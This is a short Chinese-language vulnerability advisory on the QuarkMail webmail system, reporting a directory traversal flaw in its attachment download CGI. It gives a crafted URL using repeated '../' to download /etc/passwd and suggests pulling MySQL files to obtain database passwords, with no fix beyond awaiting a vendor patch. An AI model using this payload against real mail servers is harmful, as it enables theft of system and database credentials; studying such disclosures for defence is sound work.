|
快客电邮(QuarkMail)最新远程漏洞
|
|
来源:http://www.aaibase.cn/Article/hk/201002/608.html 作者:me 发布时间:2010-03-08
|
|
漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系 统,被广泛用于各个领域的电子邮件解决方案(该产品的主要客户名单http://www.ipmotor.com/cases/cases.html), 其webmail部分使用perl cgi编写,近日笔者在渗透测试过程当中发现一处严重的安全漏洞,导致远程用户可以在邮件系统上以当前web权限身份下载任意文件,获取敏感配置文件(如 系统口令文件/数据库密码)从而进一步渗透主机或者系统。
影响范围:<=quarkmail server version 1.2.1(本稿截止为最新版)
厂商网址:http://www.ipmotor.com/
漏洞解析:用户传入的 参数没有做有效的过滤,从而导致产生了目录遍历漏洞。
漏洞测试:
登录进入系统之后访问精心构造的邮件附件URL
http://mail.xxx.com/cgi-bin/down … P/E/B/xxx@xxxx.com/
inbox/1265055507.75326.439.www.xxx.com&filename=.. /../../../../../../../../../../../../etc/passwd即可以将passwd文件下载至本地打开,下载 mysql数据库文件将可以获取数据库密码。
漏洞解决:请等待官方补丁。
|
| |
|
[ 推荐]
[ 评论(2条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
